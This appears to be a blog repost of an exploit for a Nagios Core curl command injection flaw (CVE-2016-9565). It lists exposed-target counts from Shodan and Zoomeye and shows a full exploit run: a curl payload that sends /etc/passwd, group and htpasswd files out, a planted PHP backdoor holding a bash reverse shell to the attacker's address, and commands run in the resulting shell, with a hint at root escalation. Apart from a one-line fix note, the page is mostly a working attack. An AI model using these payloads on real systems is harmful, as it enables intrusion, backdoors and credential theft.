xl7dev

Nagios Exploit Command Injection CVE-2016-9565

0x01 VULNERABILITY effect

1
2
Both of the Nagios Core stable branches 3.x and 4.x are affected
Nagios Core < 4.2.2 Curl Command Injection / Code Execution

0x02 WebSite

Nagios Core

0x03 Search Target

Zoomeye Total results: 252

Shodan Total results: 36

0x04 POC

nagios_cmd_injection.py

Video POC

Usage

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
Example exploit run
~~~~~~~~~~~~~~~~~~~~~

root@xenial:~/nagios-exploit# ./nagios_cmd_injection.py 192.168.57.3

Nagios Core < 4.2.0 Curl Command Injection PoC Exploit (CVE-2016-9565)
nagios_cmd_injection.py ver. 1.0

Discovered & Coded by:

Dawid Golunski
https://legalhackers.com

[+] Generating SSL certificate for our python HTTPS web server

[+] Starting the web server on ports 80 & 443

[+] Web server ready for connection from Nagios (http://target-svr/nagios/rss-corefeed.php). Time for your dnsspoof magic... ;)

[+] Received GET request from Nagios server (192.168.57.4) ! Sending redirect to inject our curl payload:

-Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii /usr/local/nagios/share/nagios-backdoor.php

[+] Success, curl payload injected! Received data back from the Nagios server 192.168.57.4

[*] Contents of /etc/passwd file from the target:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nagios:x:1001:1001::/home/nagios:/bin/sh
[..cut..]

[*] Contents of /usr/local/nagios/etc/htpasswd.users file:

nagiosadmin:$apr1$buzCfFb$GjV/ga6PHp53qePf0

[*] Retrieved nagios group line from /etc/group file on the target: nagios:x:1001:www-data

[+] Happy days, 'www-data' user belongs to 'nagios' group! (meaning writable webroot)

[*] Feed XML with JS payload returned to the client in the response. This should load nagios-backdoor.php in no time :)

[+] PHP backdoor should have been saved in /usr/local/nagios/share/nagios-backdoor.php on the target by now!

[*] Spawning netcat and waiting for the nagios shell (remember you can escalate to root via CVE-2016-9566 :)

Listening on [0.0.0.0] (family 0, port 8080)
Connection from [192.168.57.4] port 8080 [tcp/http-alt] accepted (family 2, sport 38718)

www-data@debjessie:/usr/local/nagios/share$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios),1002(nagcmd)

www-data@debjessie:/usr/local/nagios/share$ groups
groups
www-data nagios nagcmd

www-data@debjessie:/usr/local/nagios/share$ cat nagios-backdoor.php
[..cut..]
== Info: Server <?php system("/bin/bash -c 'nohup bash -i >/dev/tcp/192.168.57.3/8080 0<&1 2>&1 &'"); die("stop processing"); ?> is not blacklisted
[..cut..]
www-data@debjessie:/usr/local/nagios/share$ ls -ld .
ls -ld .
drwxrwsr-x 16 nagios nagios 4096 Dec 9 20:00 .

www-data@debjessie:/usr/local/nagios/share$ exit
exit
exit

[+] Shell closed

[+] That's all. Exiting

0x04 Fix Bug

Update to the latest Nagios Core release.

0x05 From

https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html